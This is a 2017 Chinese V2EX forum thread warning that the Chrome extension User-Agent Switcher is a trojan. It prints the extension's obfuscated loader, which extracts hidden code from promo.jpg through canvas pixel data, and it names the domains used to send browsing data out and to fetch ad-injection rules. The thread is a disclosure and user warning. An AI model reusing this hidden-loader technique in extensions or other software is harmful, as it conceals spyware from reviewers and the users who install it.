首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  浏览器

大家注意了 Chrome 的插件 User-Agent Switcher 是个木马

  anoymoux · 2017-09-09 06:27:10 +08:00 · 36300 次点击
这是一个创建于 770 天前的主题,其中的信息可能已经有所发展或是发生改变。
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

111 回复  |  直到 2017-11-22 16:53:01 +08:00
1  2  
    1
gzlock   2017-09-09 06:33:21 +08:00 via Android   ♥ 2
真的变 agent 了,赶紧起床删掉
    2
kmahyyg   2017-09-09 06:37:27 +08:00 via Android
天呐,等我回去看下
    3
sunbeams001   2017-09-09 07:02:01 +08:00
简直可怕
    4
Antidictator   2017-09-09 07:24:20 +08:00 via Android
我擦。。
    5
t123yh   2017-09-09 07:25:34 +08:00 via Android
真 TM 吓人啊
    6
torbrowserbridge   2017-09-09 07:51:34 +08:00 via Android
我擦,估计早就财务自由了
    7
whwq2012   2017-09-09 07:59:24 +08:00 via Android
还好我早就不用 ua 切换工具了
    8
ahhui   2017-09-09 08:01:44 +08:00 via iPhone
卧槽,起床去删
    9
houbaron   2017-09-09 08:09:59 +08:00 via Android
我现在正用着呢。。。有什么替代产品呢?
    10
torbrowserbridge   2017-09-09 08:13:40 +08:00 via Android
奇怪楼主是怎么发现的呢,赞
    11
wave3c   2017-09-09 08:15:51 +08:00
用了好多年了 惊悚
    12
mylanch   2017-09-09 08:16:08 +08:00 via iPhone
google 官方会有什么行动
    13
liyiecho   2017-09-09 08:33:14 +08:00   ♥ 5
看了下我用的是谷歌提供的 User-Agent Switcher for Chrome

@houbaron #9 https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
    14
dong3580   2017-09-09 08:39:54 +08:00 via Android
这个用了一次就删了,替换成别的了,害怕,都删了得了。firefox 那个一样名字的呢?
@liyiecho 这个居然是官方的,还好😂没中招,
    15
Cambrian07   2017-09-09 08:45:53 +08:00   ♥ 1
@liyiecho 删完了发现,我的也是谷歌提供的这个,又默默装上了……
    16
crystom   2017-09-09 08:51:53 +08:00
我曹,已中招,还好我只是使用的时候才启用这个扩展
    17
anoymoux   2017-09-09 09:00:46 +08:00
@dong3580 firefox 也不安全,这家伙写的插件大部分都提供了 firefox,opera 版本的,我列出的这几个仅在 chrome 平台就有超过 100 万用户
    18
anoymoux   2017-09-09 09:06:52 +08:00
唉,这个插件我装了几年了,想想这几年都在这个俄罗斯黑客的监控之下,挺恶心的...
    19
qlbr   2017-09-09 09:23:14 +08:00
    20
honk   2017-09-09 09:41:44 +08:00 via Android
用 dev tools 自己随便加
    21
akwIX   2017-09-09 09:47:09 +08:00
@qlbr #19 是
    23
crisfun   2017-09-09 09:54:35 +08:00 via iPhone
晚上来看看
    24
doubleflower   2017-09-09 10:06:35 +08:00
尽量不要装俄国人写的插件。。。
    25
infun   2017-09-09 10:09:46 +08:00
@Cambrian07 囧...+1
    26
lpy6759   2017-09-09 11:35:33 +08:00
删除代码能解决木马吗
    27
lantianqiren   2017-09-09 11:38:03 +08:00
楼主好人啊····
    28
deeporist   2017-09-09 11:53:48 +08:00
吃了一惊 还好我 chrome 是用 smart header 自己改的 不过 firefox 里倒是留了一个 刚才一看好像作者就是个毛子立马删之
不过 ff 里的这个我几乎就没用过就是了 改 ua 都是直接用 umatrix
    29
fzhw88   2017-09-09 11:59:03 +08:00 via Android
@liyiecho 我也是用的这个
    30
qa2080639   2017-09-09 12:08:34 +08:00
赶紧删了...
    31
zro   2017-09-09 12:10:47 +08:00
    32
zhuziyi   2017-09-09 12:13:53 +08:00 via iPhone
卧槽,先卸载为敬,快来人进一步核实。
    33
dong3580   2017-09-09 12:16:24 +08:00
@zro
我火狐上也是这个,不知道有没有问题,
    34
paradoxs   2017-09-09 12:21:09 +08:00
浏览器扩展的权限简直不要太大, 还能自动更新, 除了超级重要的扩展, 别的能不开就不开.
    35
ihciah   2017-09-09 12:40:27 +08:00 via iPhone
好多插件都被买了然后插后门代码。以前中过一个好像叫 Web timer 发现总是跳转返利链接,查了下源码惊了。。
    36
shiloh77   2017-09-09 12:43:17 +08:00
Firefox 上這位作者是用什麼名字呢?

有點害怕自己也裝到他的插件...

感謝 lz
    37
ynyounuo   2017-09-09 12:44:08 +08:00   ♥ 2
很不幸,恐怕很多人已经被荼毒一年半了。
/t/263719
    38
jfdnet   2017-09-09 12:47:29 +08:00
记得这个之前有专门文章发过 有好几个有名的插件 是被出售了之后改造了
    39
xujinkai   2017-09-09 12:53:16 +08:00
吓得我把平时不用的插件都禁用了
    40
lechain   2017-09-09 13:19:10 +08:00
一直用的 SwitchyOmega,不会有事吧?
    41
zuolan   2017-09-09 13:26:15 +08:00
可怕,感谢曝光。
    42
hjdtl   2017-09-09 13:33:07 +08:00
已经和 chrome 联系了
    43
salary123   2017-09-09 13:49:53 +08:00 via Android
这么久才有人发现。幸亏不是在常用浏览器上使用
    44
saran   2017-09-09 13:56:25 +08:00 via Android
还好宝宝不用代理(๑°3°๑)
    45
ghost444   2017-09-09 14:07:04 +08:00
@anoymoux AMO 的扩展都是人工审核过的,比起 Chrome Web Store 肯定要好一点……
    46
iyangfei   2017-09-09 14:20:52 +08:00
还好没有用这个
    47
UnisandK   2017-09-09 14:22:12 +08:00
卧槽惊了
    48
EchoChan   2017-09-09 14:27:42 +08:00
@qlbr #19 楼主说的就是这个。
    49
Clooody   2017-09-09 14:52:20 +08:00
要是真的,去 google 商店那里举报一下也好啊,免得后来人遭殃.
    50
showgood163   2017-09-09 14:54:22 +08:00 via Android
感谢楼主提醒。目前没在用这些扩展。?
    51
doubleflower   2017-09-09 14:58:15 +08:00
电脑上的 npm 包成千上万,只要其中有一个人想干点坏事或是 npm 帐号被盗。。。那破坏力比插件强不止一点啊。
    52
7654   2017-09-09 15:17:13 +08:00
哈哈我用火狐,托管在 github 的 User Agent Overrider 扩展
    53
mjar   2017-09-09 15:29:46 +08:00
没装,但是我想看看那张图片长什么样...
    54
mjar   2017-09-09 15:37:00 +08:00
![promo.jpg]( )
    55
usedname   2017-09-09 15:43:34 +08:00
    56
Izual_Yang   2017-09-09 15:50:20 +08:00 via Android
@deeporist 刚装 umatrix 的时候勾了混淆 ua,然后我上知乎就时好时坏
    58
hantsy   2017-09-09 15:57:37 +08:00   ♥ 1
我用的是 Proxy SwitchOmega
    59
ynyounuo   2017-09-09 16:37:33 +08:00
@hantsy 不是一类东西 - -
    60
popok   2017-09-09 16:56:51 +08:00
@deeporist #28 哈哈,我也用的是 smart header,简直神器
    61
redsonic   2017-09-09 17:29:51 +08:00
LZ 能不能把图片里的 js 直接贴出来
    62
lslqtz   2017-09-09 18:04:46 +08:00
我的天。。我就在用
    63
MaxMadcc   2017-09-09 18:05:23 +08:00
我也想知道把图片解密出来后,执行了什么
    64
lslqtz   2017-09-09 18:09:16 +08:00
background.js
80 行,应该可以去掉
    65
jeffson   2017-09-09 18:11:56 +08:00
可怕
    66
lslqtz   2017-09-09 18:25:12 +08:00
改掉了那些地方,然后自己提交个仅链接可查看的给自己看了
    67
U2FsdGVkX1   2017-09-09 18:36:04 +08:00
一直用 djflhoibgkdhkhhcedjiklpkjnoahfmg

由 Google 提供
    68
xifangczy   2017-09-09 18:37:25 +08:00
我靠。我就是用的这个... 不过因为他会在右键添加很多菜单还关不掉,平时都是禁止的。
    69
Tony2ee   2017-09-09 18:50:55 +08:00
额 看到这个 我就把
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
给卸载了还顺便投诉 malware...
感觉自己罪过了...
    70
asdwddd   2017-09-09 18:54:56 +08:00
还好用的是这个
User-Agent Switcher for Chrome
offered by google.com

毛子黑客真是...
    71
jliangchan   2017-09-09 19:00:37 +08:00
已经在 chrome 商店举报恶意软件, 扩展插件耍流氓真不好发现, 运营商 / dns/ 插件都可能劫持返利链接, 很难排除发现到底是谁的问题.
    72
fhefh   2017-09-09 19:29:51 +08:00
看了自己写的插件 才 60 多个人 /(ㄒoㄒ)/~~
    73
exoticknight   2017-09-09 19:32:48 +08:00
感谢,已卸载
    74
liaoyaoheng   2017-09-09 19:50:44 +08:00
举报一下,尽自己一份力。
    75
schema   2017-09-09 20:09:47 +08:00
已举报,谢谢分享~
    76
172055   2017-09-09 20:37:21 +08:00
去年就有了...
    77
yukiww233   2017-09-09 20:43:49 +08:00
吓死我了,结果发现自己用的是 google 的那个,赶紧举报
    78
skadi   2017-09-09 20:51:49 +08:00 via Android
没用过。。。
    79
hantsy   2017-09-09 20:57:16 +08:00
@ynyounuo 抱歉,没仔细看清楚。
    80
drwx   2017-09-09 21:05:33 +08:00
我用的 Header Hacker,和谷歌官方的那个插件同一作者,不过没有谷歌官方内置的 UA 列表,要自己添加,但是界面上来说似乎好用一点(?)。
    81
tbag781623489   2017-09-09 21:53:35 +08:00 via iPhone
感谢一下,怪不得经常 pop up 一些鬼佬推广。以后只能油猴或者自己写了
    82
MaxMadcc   2017-09-09 22:00:10 +08:00
@anoymoux 这插件就只把 tab 的 url 信息上传上去了吗?
    83
achendian2   2017-09-09 22:10:06 +08:00
恐怖 删
    84
LuoboTixS   2017-09-09 23:14:46 +08:00
Chrome 商店里的排名头部免费热门插件,若常年不断更新、功能已经成熟定型的话,都应该考虑是否有偷数据甚至改页面内容(广告跳转)的后门风险,不然 Dev 喝西北风啊?

英文互联网还有很多靠万能关键词 SEO 引诱点击下载的伪工具软件(广告木马)能把浏览器抽插的七窍流血,但根本不报毒也难定位
    86
xcc880   2017-09-09 23:28:42 +08:00
0.0 装了好久
    87
acess   2017-09-10 00:19:19 +08:00
为啥我看着那么眼熟呢:
Chrome 扩展被出售被加入恶意代码
http://www.solidot.org/story?mode=thread&sid=47732
    88
Kingfree   2017-09-10 00:39:10 +08:00
这家伙有问题怎么没被举报掉?
    89
xspoco   2017-09-10 00:50:04 +08:00
我竟然装了。。赶紧删了。。
    90
redsonic   2017-09-10 01:20:25 +08:00
折腾了一下,没发现任何数据泄漏给那个域名。
t.prototype.Vh 这个调用过程中没有参数,导致
if (u.style.display = "none", u.width || t.width, u.height || t.height, 0 === u.width || 0 === u.height) return "";
直接 return,也就没法知道 hack 的代码藏在图片的哪个位置

就算注释掉掉这句,由于 canvas 没有绘图,所以 d 里面是全 0
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";

最后也是 return,到不了后面的解码。LZ 应该分享一下怎么知道里面藏着什么东西的。我不是替这个插件说话,只是想知道实际的受害程度,load 一个图片然后跑了一大段混淆的代码确实没安什么好心。
    91
15015613   2017-09-10 08:19:40 +08:00   ♥ 2
    92
lingaoyi   2017-09-10 09:24:05 +08:00 via iPhone
好恐怖....
    93
Haiwx   2017-09-10 10:14:10 +08:00
@15015613 最后一次更新 January 4, 2011,手动摊手
    95
xi_lin   2017-09-10 11:22:55 +08:00
中奖了
    96
redsonic   2017-09-10 11:46:21 +08:00
@cyg07 https://cert.360.cn/warning/detail?id=866e27f5a3dd221b506a9bb99e817889
然而还是不清不楚,没有文件 hash,没有署名,没有提图片里藏什么了以及藏哪了。我实际验证了这个插件,80 行确实加载了 promo.jpg ,但后面马上就返回了。可能实际危害要小很多。
    97
anoymoux   2017-09-10 16:46:05 +08:00   ♥ 1
@redsonic 费了那么大劲把代码藏在图片里,怎么可能执行一下就返回了...你把那一行提取出来 debug 跟踪一下就明白了,下面两段代码是解密出来的
https://pastebin.com/ZYd82Hkm
https://pastebin.com/gXV094wm
虽然混淆了,但是还是很容易看出木马行为的...这作者还是挺狡猾的,刚安装之后不会触发监控模块,24 小时之后才会.
另外 chrome 的 F12 network 里看不到插件发送的请求,这也是很多恶意插件能够存在这么长时间原因...如果想看某一个插件发送的请求,在 chrome://extensions/点击插件->背景页,选择 network 就能看到了
    98
redsonic   2017-09-10 17:36:09 +08:00
@anoymoux

d=c.data,g=[];console.log(d) 打印出来是全 0 然会就返回了,应该是这个图片显示出来的时候才解密代码,我抓了两天的包都没抓到,chrome 59 源代码 hook 了 url request 也没看到有相关域名,是有什么触发条件吗? 你是随便开一个 tab 就能抓到?
    99
redsonic   2017-09-10 19:22:09 +08:00
@anoymoux 谢谢,直接在 extensions 里面就地调试 可以解出代码了,只不过第一次 getImageData 还是全 0,要第二次才行 。 把那段单独抽出来不管怎么调试都是 return。不过解出来的混淆代码还是没发出任何东西,在里面循环了一段就退出了,应该还是需要什么条件。
    100
redsonic   2017-09-10 19:39:59 +08:00
这部分是什么 https://pastebin.com/gXV094wm

我解出的代码是这部分 https://pastebin.com/ZYd82Hkm

@anoymoux
1  2  
关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2232 人在线   最高记录 5043   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.3 · 96ms · UTC 05:23 · PVG 13:23 · LAX 22:23 · JFK 01:23
♥ Do have faith in what you're doing.